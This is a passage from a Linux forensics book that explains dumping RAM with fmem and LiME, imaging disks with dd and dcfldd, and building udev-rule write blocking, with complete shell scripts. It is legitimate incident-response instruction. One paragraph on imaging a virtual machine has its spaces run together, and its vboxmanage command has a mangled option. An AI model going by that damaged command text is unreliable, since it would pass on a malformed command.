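Identical hashes are not always malicious (hard links and identical helper binaries also produce them), so each group still needs a human look.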

DUMPING RAM

What is the perfect way to capture a running system? Get a copy of what is in RAM. This allows you to exactly recreate the state of a machine. Okay, not exactly, but close enough for our investigative purposes. Some recently released tools such as Volatility make acquiring RAM images particularly useful. Getting these images today isn’t necessarily easy, however.

Many years ago when computers had a gigabyte or less of RAM it was very easy to acquire a memory image in Linux. Part of the reason for this is that the Linux “everything is a file” philosophy also applied to RAM. The device /dev/mem represented all of the physical RAM. This device still exists today, but it is only capable of accessing the first 896 MB of physical RAM.

Virtual memory (physical RAM plus memory swapped to disk) was accessible via the /dev/kmem device. It didn’t take very long for the worldwide Linux community to figure out that having a userland (non-kernel, non-privileged mode) device that could access all memory was a huge security hole. Today /dev/kmem has been removed. Alternative means of capturing memory images are now required.

RAM acquisition methods

There are hardware devices for capturing memory. Memory dumping agents also exist. These agents are part of enterprise security solutions. These two methods for acquiring memory images are somewhat expensive and suffer from the fact that they must be in place before a breach. Neither of these is widely used.

Other than the two choices above, if you want to capture memory you will need to create some sort of device which can access all of the virtual memory. Incidentally, this assumes your subject system is not running inside a virtual machine. If it is running inside a virtual machine, consult your virtualization software documentation for instructions on capturing memory from the host. The techniques presented here will still work on both physical and virtual systems.

A forensics memory device, fmem, is available for download from http://hysteria.sk/~niekt0/foriana/fmem_current.tgz. Because the fmem device (along with the LiME device to be discussed next) is highly dependent on various kernel structures, it must be built from source using header files from the subject machine. Remember my earlier warnings concerning building anything on the subject system.

Once built and installed the newly created device /dev/fmem works just like /dev/mem, but without the limitation of only accessing the first 896 MB of RAM. The /dev/fmem device can be used to dump the physical RAM and /proc/iomem used to determine where to find the interesting portions. Using fmem you will end up with a raw memory image. A screenshot from the terminal window I used to build and install fmem on my forensics workstation is shown in Figure 3.9. Notice that fmem is simple enough that the entire build and install process fits on a single screen including the printout of the memory areas after installation.

FIGURE 3.9

Building and installing fmem.

Issuing the command cat /proc/iomem will print a long list of information, most of which is uninteresting to the forensic investigator. If we use grep (named after the ed command g/re/p, globally search for a regular expression and print) to extract only the “System RAM” entries from the results using the command cat /proc/iomem | grep "System RAM", we will see which relevant blocks of memory should be captured. The tail of the unfiltered output from cat /proc/iomem and the results of piping this to grep "System RAM" are shown in Figure 3.10.

FIGURE 3.10

Results from catting the /proc/iomem pseudo file. Unfiltered results are shown at the top and the blocks of system RAM are shown at the bottom.
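The “System RAM” lines give each block as a pair of hexadecimal addresses, while a tool such as dd wants offsets and lengths. A small sketch of that conversion follows; the helper name ram_blocks is hypothetical, and it assumes the usual /proc/iomem line layout of start-end : description.

```shell
#!/bin/sh
# Hypothetical helper: read /proc/iomem-style lines on standard input and
# print "<start offset> <length>" in decimal bytes for each System RAM block.
ram_blocks() {
    grep 'System RAM' | while read -r range _; do
        start=$((0x${range%-*}))    # text before the dash, as hex
        end=$((0x${range#*-}))      # text after the dash, as hex
        echo "$start $((end - start + 1))"
    done
}

# Typical use (as root; unprivileged reads may show zeroed addresses):
#   cat /proc/iomem | ram_blocks
```

The end address is inclusive, which is why one is added when computing the length.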

The dd utility can be used to dump the relevant RAM sections to a file. This raw capture is difficult to use for anything beyond simple searches. The dd program and related utilities will be fully described in the next chapter (Chapter 4: Creating Images). Thankfully, there is a much easier and more useful way to collect memory images that we will discuss next.

Building LiME

The Linux Memory Extractor (LiME) is the tool of choice for extracting memory on Linux systems for a couple of reasons. First, it is very easy to use. Second, and more importantly, it stores the capture in a format that is easily read by the Volatility memory analysis framework.

As with fmem, LiME must be built from source. LiME should be built for the exact kernel version of the subject system, but never on the subject system. If your forensics workstation just happens to be running the identical version of Ubuntu used by the subject, the command sudo apt-get install lime-forensics-dkms will download and build LiME for you.

For every other situation you must download LiME from https://github.com/504ensicsLabs/LiME using the command git clone https://github.com/504ensicsLabs/LiME and compile it with the correct kernel headers. If your workstation and the subject have the exact same kernel, LiME is built by simply changing to the directory where LiME resides and running make with no parameters. The complete set of commands to download and build LiME for the current kernel are shown in Figure 3.11. Notice that everything fits on a single screen even with my fat-fingering a few commands (running make before changing to the src directory, etc.). Also notice the last line moves (renames) the lime.ko file to lime-<kernel version>.ko.

FIGURE 3.11

Downloading and building LiME for the current kernel. Note that the module file is automatically renamed to lime-<kernel version>.ko when using this method.

If the kernel versions differ, the correct command to build LiME for the subject is make -C /lib/modules/<kernel version>/build M=$PWD. Note that when you build a LiME module this way the output file is not renamed with a suffix for the exact kernel version. I strongly recommend you do this yourself as it doesn’t take long for you to end up with a collection of LiME kernel modules on your response drive. The commands to build and rename a LiME module that is not built for the current kernel are shown in Figure 3.12.

FIGURE 3.12

Building LiME for other than the current kernel. It is recommended that the lime.ko file be renamed to something more descriptive after it is created.
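Since the figure itself is not reproduced here, the two steps just described can be sketched as follows. This is only a dry run: the helper name lime_build_commands is hypothetical, it prints the commands rather than running them, and it assumes the headers for the target kernel are installed under /lib/modules on the forensics workstation.

```shell
#!/bin/sh
# Hypothetical helper: print (not run) the commands to build LiME for a
# given kernel version and rename the resulting module. The printed
# commands are meant to be run from the LiME src directory.
lime_build_commands() {
    kver="$1"
    echo "make -C /lib/modules/${kver}/build M=\$PWD"
    echo "mv lime.ko lime-${kver}.ko"
}

# Show the commands for the kernel currently running on this workstation.
lime_build_commands "$(uname -r)"
```

Passing the subject's kernel version (as reported by uname -r on the subject) instead of the workstation's produces the commands for the cross-version case.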

Using LiME to dump RAM

Assuming that you have built LiME for the current kernel version in use by your subject system you are now ready to use it. Before using LiME you must make two choices. The first choice is the format for output and the second is a destination for the dump file, which LiME calls a path.

There are three format choices: raw, padded, and LiME. Raw format is every memory segment concatenated together. When using the raw format, address ranges that are not system RAM are skipped, so the original position of each segment is lost. Padded is similar to raw, but the skipped ranges are filled with zeros so you can know the location of memory chunks, not just their contents.

Not surprisingly, the LiME format is the recommended format. This format captures memory and stores it in structures complete with metadata. This is the format recommended by the authors of the Volatility memory analysis framework. I also recommend this format as it contains the most information for your later analysis.

LiME supports two different paths: a file or a network port. If you have connected a large capacity USB drive to the subject computer it is acceptable to store your RAM dump directly to a file on this drive. Under no circumstances should this file be saved to the subject’s hard drive! The network port path is my preferred method for extracting memory images. When using this technique a listener is set up on the subject system, and netcat is used on the forensics workstation to receive the memory dump.

The general format for running LiME is sudo insmod lime.ko "path=<path> format=<format>". This command installs (or inserts) a kernel module. For obvious reasons this command requires root privileges. Notice that I have put quotes around the parameters for LiME. This is what you need to do with most versions of Linux. If this doesn’t work for you try removing the quotes.

To dump the RAM copy the correct LiME module to your response drive or other media (never the subject’s hard disk!). On the subject machine execute sudo insmod lime-<kernel version>.ko "path=tcp:<port number> format=lime" to set up a listener that will dump RAM to anyone that connects. Note that LiME supports other protocols such as UDP, but I recommend you stick with TCP. It isn’t a bad idea to run uname -a before installing LiME to double check that you are using the correct kernel version. The commands for installing LiME on the subject system are shown in Figure 3.13.

FIGURE 3.13

Installing LiME on the subject system. Note that uname -a has been run before installing LiME to remind the investigator which version of LiME should be used.

On the forensics workstation running nc {subject IP} {port used by LiME} > {filename}, e.g. nc 192.168.56.101 8888 > ram.lime, will connect to the LiME listener, which then sends the RAM dump over the network. Once the dump has been sent LiME uninstalls the module from the subject system. The beginning of the received RAM dump is shown in Figure 3.14. Note that the file header is “EMiL” or LiME spelled backwards.

FIGURE 3.14

The RAM dump file in LiME format. Note that the header is “EMiL” or LiME spelled backwards.
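The header noted above makes for a quick sanity check on a received dump before it is filed away. A minimal sketch, assuming only what the text states (the file starts with the four bytes “EMiL”); the helper name is_lime_dump is hypothetical:

```shell
#!/bin/sh
# Hypothetical helper: succeed if the file begins with the four bytes "EMiL".
is_lime_dump() {
    [ "$(head -c 4 "$1")" = "EMiL" ]
}

# Example (file name taken from the nc example in the text):
#   is_lime_dump ram.lime && echo "looks like a LiME format dump"
```

This only confirms the transfer produced a file in the expected format; it says nothing about whether the dump is complete.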

SUMMARY

In this chapter we have discussed multiple techniques that can be used to gather information from a system without taking it offline. This included collecting an image of system memory for later offline analysis. Analyzing this image will be discussed later in this book (Chapter 8: Memory Analysis). In the next chapter we will turn our attention to traditional dead analysis which requires us to shut down the subject system.

CHAPTER 4

Creating Images

INFORMATION IN THIS CHAPTER:

Shutting down the system
Image formats
Using dd
Using dcfldd
Hardware write blocking
Software write blocking
Udev rules
Live Linux distributions
Creating an image from a virtual machine
Creating an image from a physical drive

SHUTTING DOWN THE SYSTEM

We are finally ready to start the traditional dead analysis process. We have now progressed to the next block in our high level process as shown in Figure 4.1. If some time has passed since you performed your initial scans and live analysis captures described in the preceding chapters, you may wish to consider rerunning some or all of the scripts.

FIGURE 4.1

High level forensic incident response process.

As you prepare to shut down the system for imaging you are faced with a decision to perform a normal shutdown or to pull the plug. As with many things in forensics, there is not one right answer to this question for every situation. The investigator must weigh the pluses and minuses for each option.

Normal shutdown

A normal shutdown should, in theory, leave you with a clean filesystem. This, of course, assumes that this is possible with a system infected with malware. I have found that some rootkits prevent a normal shutdown. The biggest reason not to use a normal shutdown is that some malware might clean up after itself, destroy evidence, or even worse destroy other information on the system. With the modern journaling filesystems likely to be found on the subject system, a clean filesystem is not as crucial as it was many years ago.

Pulling the plug

If we simply cut power to the subject system the filesystem(s) may not be clean. As previously mentioned, this is not necessarily as serious as it was before journaling filesystems became commonplace. One thing you can do to minimize the chances of dealing with a filesystem that is extremely dirty (lots of file operations waiting in the cache) is to run the sync command before pulling the plug. There is always a chance that an attacker has altered the sync program, but in the rare instances where they have done so your live analysis would likely have revealed this.

The best thing this method has going for it is that malware doesn’t have any chance to react. Given the information collected by running your scripts during the live analysis and memory image you have dumped, you are not likely to lose much if any information by pulling the plug. If you suspect a malware infection this is your best option in most cases.

IMAGE FORMATS

As with the memory images, there are choices of formats for storing filesystem images. At a basic level you must decide between a raw format and a proprietary format. Within these choices there are still subchoices to be made.

Raw format

The raw format is nothing more than a set of bytes stored in the same logical order as they are found on disk. Nearly all media you are likely to encounter utilize 512 byte sectors. Whereas older devices formatted with Windows filesystems (primarily FAT12 and FAT16) may use cylinders, heads, and sectors to address these sectors, the Linux forensics investigator is much more fortunate in that media he or she encounters will almost certainly use Logical Block Addressing (LBA).

On media where LBA is used sectors are numbered logically from 0 to ({media size in bytes} / 512 - 1). The sectors are labeled LBA0, LBA1, etc. It is important to understand that this logical addressing is done transparently by the media device and is therefore deterministic (it doesn’t depend on which operating system reads the filesystem, etc.). A raw image is nothing more than a large file with LBA0 in the first 512 bytes, followed by LBA1 in the next 512 bytes, and so on.
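Because a raw image is just sectors laid end to end, the LBA arithmetic above translates directly into standard tools. The following is a small sketch assuming 512 byte sectors; the helper names last_lba and read_sector are hypothetical.

```shell
#!/bin/sh
SECTOR_SIZE=512

# Highest LBA in a raw image: (size in bytes / 512) - 1.
last_lba() {
    size=$(wc -c < "$1")
    echo $((size / SECTOR_SIZE - 1))
}

# Write the 512 bytes stored at the given LBA to standard output.
# LBA n starts at byte offset n * 512, which dd expresses as skip=n.
read_sector() {
    dd if="$1" bs="$SECTOR_SIZE" skip="$2" count=1 2>/dev/null
}

# Example (image name assumed): dump LBA0 of an image in hex.
#   read_sector sda.img 0 | xxd | head
```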

Because the raw format is essentially identical to what is stored on the media, there are numerous standard tools that can be used to manipulate raw images. For this and other reasons the raw format is very popular and supported by every forensics tool. Because raw images are the same size as the media they represent, they tend to be quite large.

Some investigators like to compress raw images. Indeed, some forensics tools can operate on compressed raw images. One thing to keep in mind should you choose to work with compressed images is that it limits your tool selection. It will also likely result in a performance penalty for many common forensics tasks such as searching.

Proprietary format with embedded metadata

EnCase is a widely used proprietary forensics tool. It is especially popular among examiners that focus on Windows systems. The EnCase file format consists of a header, the raw sectors with checksums every 32 kilobytes (64 standard sectors), and a footer. The header contains metadata such as the examiner, acquisition date, etc. and ends with a checksum. The footer has an MD5 checksum for the media image.

The EnCase file format supports compression. Compression is done at the block level which makes searching a little faster than it would be otherwise. The reason for this is that most searches are performed for certain types of files and file headers at the beginning of blocks (sectors) are used to determine file type.

Proprietary format with metadata in a separate file

Halfway between the raw format and some sort of proprietary format is the use of multiple files to store an image. Typically one file is a raw image and the other stores metadata in a proprietary way. A number of imaging tools make this choice.

Raw format with hashes stored in a separate file

In my opinion, the best option is to acquire images in the raw format with hashes stored separately. This allows the image to be used with every forensics package available and adds standard Linux system tools to your toolbox. The hashes allow you to prove that you have maintained the integrity of the image during the investigation.

In a perfect world you would create an image of a disk and calculate a hash for the entire image and that would be the end of it. We don’t live in a perfect world, however. As a result, I recommend that you hash chunks of the image in addition to calculating an overall hash.

There are a couple of reasons for this recommendation. First, it is a good idea to periodically recalculate the hashes as you work to verify you have not changed an image. If the image is large, computing the overall hash might be time consuming when compared to hashing a small chunk. Second, you may encounter media that is damaged. Certain areas may not read the same every time. It is much better to discard data from these damaged areas than to throw out an entire disk image if the hash doesn’t match. Fortunately some of the tools to be discussed in this chapter do this hashing for you.
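To make the idea of chunk hashes concrete, here is a minimal sketch using only dd and sha256sum. The helper name hash_chunks and the output layout are assumptions for illustration; dcfldd, discussed later in this chapter, produces its own log format.

```shell
#!/bin/sh
# Hypothetical helper: print "<byte offset> <sha256>" for each chunk of an
# image, followed by the hash of the whole image. The chunk size is given
# in bytes; dd buffers one chunk in memory at a time.
hash_chunks() {
    image="$1"
    chunk="$2"
    size=$(($(wc -c < "$image")))
    index=0
    while [ $((index * chunk)) -lt "$size" ]; do
        hash=$(dd if="$image" bs="$chunk" skip="$index" count=1 2>/dev/null |
            sha256sum | cut -d ' ' -f 1)
        echo "$((index * chunk)) $hash"
        index=$((index + 1))
    done
    echo "total $(sha256sum < "$image" | cut -d ' ' -f 1)"
}

# Example (names assumed): hash sdb.img in 1 MiB chunks.
#   hash_chunks sdb.img 1048576 > sdb.hashes
```

Rerunning the helper later and comparing the two outputs with diff shows exactly which chunks, if any, have changed.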

USING DD

All Linux systems ship with a bit-moving program known as dd. This utility predates Linux by several years. Its original use was for converting to and from ASCII (American Standard Code for Information Interchange) and EBCDIC (Extended Binary Coded Decimal Interchange Code). For those unfamiliar with EBCDIC, it was an encoding primarily used by IBM mainframes.

In addition to its conversion capabilities, dd is used for pushing data from one place to another. Data is copied in blocks, with a default block size of 512 bytes. The most basic use of dd is dd if=<input file> of=<output file> bs=<block size>. In Linux, where everything is a file, if the input file represents a device, the output file will be a raw image.

For example, dd if=/dev/sda of=sda.img bs=512 will create a raw image of the first drive on a system. I should point out that you can also image partitions separately by using a device file that corresponds to a single partition such as /dev/sda1, /dev/sdb2, etc. I recommend that you image the entire disk as a unit, however, unless there is some reason (such as lack of space to store the image) that prevents this.

There are a few reasons why I recommend imaging the entire drive if at all possible. First, it becomes much simpler to mount multiple partitions all at once using scripts presented later in this book. Second, any string searches can be performed against everything you have collected, including swap space. Finally, there could be data hidden in unallocated space (not part of any partition).

Does block size matter? In theory it doesn’t matter as dd will faithfully copy any partial blocks so that the input and output files are the same size (assuming no conversions are performed). The default block size is 512 bytes. Optimum performance is achieved when the block size is an even multiple of the bytes read at a time from the input file.

As most devices have 512 byte blocks, any multiple of 512 will improve performance at the expense of using more memory. In the typical scenario (described later in this chapter) where an image is being created from media removed from the subject system, memory footprint is not a concern and a block size of 4 kilobytes or more is safely used. Block sizes may be directly entered in bytes or as multiples of 512 bytes, kilobytes (1024 bytes), megabytes (1024 * 1024 bytes) using the symbols b, k, and M, respectively. For example, a 4 kilobyte block size can be written as 4096, 8b, or 4k.
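The equivalence of the three spellings is easy to confirm without touching any evidence. In this small sketch (the helper name block_bytes is hypothetical) dd copies exactly one block from /dev/zero and wc counts the bytes; each of the three specifications should report 4096.

```shell
#!/bin/sh
# Hypothetical helper: report how many bytes dd reads for one block of the
# given size specification.
block_bytes() {
    dd if=/dev/zero bs="$1" count=1 2>/dev/null | wc -c
}

for spec in 4096 8b 4k; do
    echo "bs=$spec -> $(block_bytes "$spec") bytes"
done
```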

There is one last thing I should mention before moving on to another tool. What happens when there is an error? The default behavior is for dd to fail. This can be changed by adding the option conv=noerror,sync to the dd command. When a read error occurs, any bad bytes will be replaced with zeros in order to synchronize the position of everything between the input and output files.

USING DCFLDD

The United States Department of Defense Computer Forensics Lab developed an enhanced version of dd known as dcfldd. This tool adds several forensics features to dd. One of the most important features is the ability to calculate hashes on the fly. The calculated hashes may be sent to a file, displayed in a terminal (default), or both.

In addition to calculating an overall hash, dcfldd can compute hashes for chunks of data (which it calls windows). As of this writing, dcfldd supports the following hash algorithms: MD5, SHA1, SHA256, SHA384, and SHA512. Multiple hash algorithms may be used simultaneously with hashes written to separate files.

The general format for using dcfldd to create an image with hashes in a separate file is dcfldd if=<subject device> of=<image file> bs=<block size> hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file> conv=noerror,sync. For example, to create an image of the second hard drive on a system with SHA256 hashes calculated every 1 GB the correct command would be dcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256 hashwindow=1G hashlog=sdb.hashes conv=noerror,sync. If you wanted to calculate both SHA256 and MD5 hashes for some reason the command would be dcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256,md5 hashwindow=1G sha256log=sdb.sha256hashes md5log=sdb.md5hashes conv=noerror,sync.

HARDWARE WRITE BLOCKING

You should have some means of assuring that you are not altering the subject’s hard drives and/or other media when creating images. The traditional way to do this is to use a hardware write blocker. In many cases hardware write blockers are protocol (SATA, IDE, SCSI, etc.) specific.

Hardware write blockers tend to be a little pricey. A cheaper model might cost upwards of US$350. Because they are expensive, you might not be able to afford a set of blockers for all possible protocols. If you can only afford one blocker I recommend you buy a SATA unit as that is by far what the majority of systems will be using. A relatively inexpensive blocker is shown in Figure 4.2. If you find yourself doing a lot of Linux response in data centers a SCSI unit might be a good choice for a second blocker.

FIGURE 4.2

A Tableau SATA write blocker.

There are a few cheaper open-source options available, but they tend to have limitations. One such option is a microcontroller-based USB write blocker which I developed and described in a course on USB forensics at PentesterAcademy.com (http://www.pentesteracademy.com/course?id=16). I do not recommend the use of this device for large media, however, as it is limited to USB 2.0 full speed (12 Mbps). I may port this code to a new microcontroller that is capable of higher speeds (at least 480 Mbps) at some point, but for the moment I recommend the udev rules method described later in this chapter.

SOFTWARE WRITE BLOCKING

Just as hardware routers are really just pretty boxes running software routers (usually on Linux), hardware write blockers are almost always small computer devices running write blocking software. There are several commercial options for Windows systems. Naturally, most of the Linux choices are free and open source.

There is a kernel patch available to mount block devices automatically. You can also set something up in your favorite scripting language. Next I will describe a simple way to block anything connected via USB using udev rules.

Udev rules

Udev rules are the new way to control how devices are handled on Linux systems. Using the udev rules presented below, a “magic USB hub” can be created that automatically mounts any block device connected downstream from the hub as read-only.

Linux systems ship with a set of standard udev rules. Administrators may customize their systems by adding their own rules to the /etc/udev/rules.d directory. Like many system scripts (e.g. startup scripts), the order in which these rules are executed is determined by the filename. Standard practice is to start the filename with a number which determines when it is loaded.

When the rules in the rules file below are run, not all of the information required to mount a filesystem is available yet. For this reason, the rules run scripts which generate other scripts, so that the work is done in two stages. The file should be named /etc/udev/rules.d/10-protectedmount.rules. Note that the vendor and product identifiers will be set with an install script to match your hub. This install script is presented later in this chapter.

ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="1a40", ATTRS{idProduct}=="0101", ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n"

ACTION=="remove", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="1a40", ATTRS{idProduct}=="0101", ENV{PHIL_UNMOUNT}="1", RUN+="/etc/udev/scripts/protmount3.sh %k %n"

ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh"

ENV{PHIL_MOUNT}!="1", ENV{UDISKS_PRESENTATION_HIDE}="0", ENV{UDISKS_AUTOMOUNT_HINT}="always"

ENV{PHIL_UNMOUNT}=="1", RUN+="/etc/udev/scripts/protmount4-%n.sh"

The general format for these rules is a series of statements separated by commas. The first statements, those with double equals (“==”), are matching statements. If all of these are matched, the remaining statements are run. These statements primarily set environment variables and add scripts to a list of those to be run. Any such scripts should run quickly in order to avoid bogging down the system.

The first rule can be broken into matching statements and statements to be executed. The matching statements are ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="1a40", ATTRS{idProduct}=="0101". This matches when a new device is added; it is a block device; it is named /dev/sdXn (where X is a letter and n is a partition number); and its or a parent’s USB vendor and product ID match those specified. If you only want to match the current device’s attribute and not the parent’s, use ATTR{attributeName} instead of ATTRS{attributeName}. By using ATTRS we are assured the rule will be matched by every device attached downstream from the hub.

The part of the first rule containing commands to run is ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n". These statements set an environment variable PHIL_MOUNT equal to 1, set another environment variable PHIL_DEV to the kernel name for the device (sda3, sdb1, etc.), and append /etc/udev/scripts/protmount.sh to the list of scripts to be run with the kernel name for the device and partition number passed in as parameters.

The second rule is very similar to the first, but it matches when the device is removed. It sets an environment variable PHIL_UNMOUNT to 1 and adds /etc/udev/scripts/protmount3.sh to the list of scripts to be run (the kernel device name and partition number are again passed in as parameters). The protmount3.sh and protmount4.sh scripts are used to clean up after the device is removed.

The next rule ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh" is run later just before the operating system attempts to mount the filesystem. If the PHIL_MOUNT variable has been set, we tell the operating system to hide the normal dialog that is displayed, never automount the filesystem (because it wouldn’t be mounted read-only), and add the protmount2 script for this partition to the list of things to be executed. If PHIL_MOUNT has not been set to 1, we set up the operating system to handle the device the standard way. The last rule causes the protmount4 script for this partition to run if the PHIL_UNMOUNT variable has been set.

We will now turn our attention to the scripts. Two of the scripts, protmount.sh and protmount3.sh, are used to create the other two, protmount2.sh and protmount4.sh (each suffixed with the partition number), respectively. As previously mentioned, the reason for this is that all of the information needed to properly mount and unmount the filesystem is not available at the same time. The protmount.sh script follows.

#!/bin/bash
# $1 is the kernel device name (e.g. sdb1), $2 is the partition number
echo "#!/bin/bash" > "/etc/udev/scripts/protmount2-$2.sh"
echo "mkdir /media/$1" >> "/etc/udev/scripts/protmount2-$2.sh"
echo "chmod 777 /media/$1" >> "/etc/udev/scripts/protmount2-$2.sh"
echo "/bin/mount /dev/$1 -o ro,noatime /media/$1" >> "/etc/udev/scripts/protmount2-$2.sh"
chmod +x "/etc/udev/scripts/protmount2-$2.sh"

This script echoes a series of commands to the new script. The first line includes the familiar she-bang. The second line creates a directory, /media/{kernel device name} (e.g. /media/sdb2). The third line opens up the permissions on the directory. The fourth line mounts the filesystem as read-only with no access time updating in the newly created directory. The final line in the script makes the protmount2.sh script executable.

The protmount3.sh script is similar except that it creates a cleanup script. The cleanup script is protmount4.sh. The protmount3.sh script follows.

#!/bin/bash
# $1 is the kernel device name (e.g. sdb1), $2 is the partition number
echo "#!/bin/bash" > "/etc/udev/scripts/protmount4-$2.sh"
echo "/bin/umount /dev/$1" >> "/etc/udev/scripts/protmount4-$2.sh"
echo "rmdir /media/$1" >> "/etc/udev/scripts/protmount4-$2.sh"
chmod +x "/etc/udev/scripts/protmount4-$2.sh"

An installation script has been created for installing this system. This script takes a vendor and product ID as required parameters. It also takes an optional second product ID. You might be curious as to why this is in the script. If you are using a USB 3.0 hub (recommended) it actually presents itself as two devices, one is a USB 2.0 hub and the other is a USB 3.0 hub. These two devices will have a common vendor ID, but unique product IDs.

#!/bin/bash
#
# Install script for 4deck addon to "The Deck"
# This script will install udev rules which will turn a USB hub
# into a magic hub. Every block device connected to the magic hub
# will be automatically mounted under the /media directory as read only.
# While this was designed to work with "The Deck" it will most likely
# work with most modern Linux distros. This software is provided as is
# without warranty of any kind, express or implied. Use at your own
# risk. The author is not responsible for anything that happens as
# a result of using this software.
#
# Initial version created August 2012 by Dr. Phil Polstra, Sr.
# Version 1.1 created March 2015
# new version adds support for a second PID which is required
# when using USB 3.0 hubs as they actually present as two hubs

unset VID
unset PID
unset PID2

function usage {
  echo "usage: sudo $(basename $0) --vid 05e3 --pid 0608 [--pid2 0610]"
  cat <<EOF
Bugs email: "DrPhil at polstra.org"
Required Parameters:
--vid <Vendor ID of USB hub>
--pid <Product ID of USB hub>
Optional Parameters:
--pid2 <Second Product ID of USB 3.0 hub>
EOF
  exit
}

function createRule {
cat > /etc/udev/rules.d/10-protectedmount.rules <<-__EOF__
ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID}", ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n"
ACTION=="remove", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID}", ENV{PHIL_UNMOUNT}="1", RUN+="/etc/udev/scripts/protmount3.sh %k %n"
ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh"
ENV{PHIL_MOUNT}!="1", ENV{UDISKS_PRESENTATION_HIDE}="0", ENV{UDISKS_AUTOMOUNT_HINT}="always"
ENV{PHIL_UNMOUNT}=="1", RUN+="/etc/udev/scripts/protmount4-%n.sh"
__EOF__
if [ ! "$PID2" = "" ] ; then
cat >> /etc/udev/rules.d/10-protectedmount.rules <<-__EOF__
ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID2}", ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n"
ACTION=="remove", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID2}", ENV{PHIL_UNMOUNT}="1", RUN+="/etc/udev/scripts/protmount3.sh %k %n"
ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh"
ENV{PHIL_MOUNT}!="1", ENV{UDISKS_PRESENTATION_HIDE}="0", ENV{UDISKS_AUTOMOUNT_HINT}="always"
ENV{PHIL_UNMOUNT}=="1", RUN+="/etc/udev/scripts/protmount4-%n.sh"
__EOF__
fi
}

function copyScripts {
  if [ ! -d "/etc/udev/scripts" ] ; then
    mkdir /etc/udev/scripts
  fi
  cp ./protmount*.sh /etc/udev/scripts/.
}

# parse command line options
while [ ! -z "$1" ]; do
  case $1 in
    -h|--help)
      usage
      ;;
    --vid)
      VID="$2"
      ;;
    --pid)
      PID="$2"
      ;;
    --pid2)
      PID2="$2"
      ;;
  esac
  shift # consume command line arguments 1 at a time
done

# now actually do something
createRule
copyScripts

The script is straightforward. It begins with the usual she-bang, then three variables (VID, PID, and PID2) are unset. We see a typical usage function, then a few functions are defined for creating and copying files. Finally, these functions are run at the end of the script.
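The vendor and product IDs that the install script expects can be read from the output of lsusb, which prints them as an ID vendor:product pair on each line. The following is only a sketch: the helper name hub_ids is hypothetical, and it simply lists every line whose description mentions a hub, so the system's built-in root hubs will appear alongside your external hub.

```shell
#!/bin/sh
# Hypothetical helper: read lsusb output on standard input and print
# "<vendor ID> <product ID>" for every line that describes a hub.
hub_ids() {
    grep -i 'hub' |
        sed -n 's/.* ID \([0-9a-fA-F]\{4\}\):\([0-9a-fA-F]\{4\}\).*/\1 \2/p'
}

# Typical use on the forensics workstation:
#   lsusb | hub_ids
```

Running it once with the hub unplugged and once with it connected makes it obvious which pair (or pairs, for a USB 3.0 hub) belongs to the hub.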

Live Linux distributions

The preferred method of creating an image of a hard drive is to remove it from the subject system. This is not always practical, however. For example, some laptops (including the one I am currently using to write this book) must be disassembled to remove the hard drive as they lack access panels for this purpose. Booting a live Linux distribution in forensics mode can be the easiest option for these types of situations.

There are a couple of options available. Most any live Linux will work, but it never hurts to use a forensics-oriented distribution like SIFT. You can either install it to its own USB drive or use the same USB drive that you use for your known-good binaries. As I said earlier in this book, if you do this you will need to format the drive with multiple partitions. The first must be FAT in order for it to boot, and the partition with the binaries must be formatted as ext2, ext3, or ext4 to preserve permissions.

There are some that like to use a live Linux distribution on the forensics workstation. I recommend against doing this. My primary objection to doing this is that the performance is always relatively poor when running a live Linux distribution, as everything is run in RAM. If you are just running the live Linux distribution for the write blocking, I recommend you just use my udev rules-based blocking described earlier in this chapter.

CREATINGANIMAGEFROMAVIRTUALMACHINEWhileyouarenotlikelytoneedtocreateanimagefromavirtualmachineprofessionally,youmightwish to do so if you are practicing and/or following alongwith someof theexamplesfromthisbook.Ifallyouneedisarawimage,youcanusethetoolsthatcomewithVirtualBoxinordertocreatearawimage.

One downside of using theVirtualBox tools is that youwon’t get the hashes dcflddprovides.Anotherdownsideisthatyouwon’tgettopracticeusingthetoolsyouneedforimaging a physical drive. The command to create the image from a Linux host isvboxmanage clonehd <virtual disk image file> <output rawimagefile>—formatRAW.

If you are hosting your virtual machine on Linux, you can still use the standard tools such as dcfldd. The reason that this works is that Linux is smart enough to treat this virtual image file like a real device. This can be verified by running the command fdisk <virtual disk image file>. The results of running this command against a virtual machine hard drive are shown in Figure 4.3.

FIGURE 4.3

Results of running fdisk against a virtual machine image.

CREATING AN IMAGE FROM A PHYSICAL DRIVE

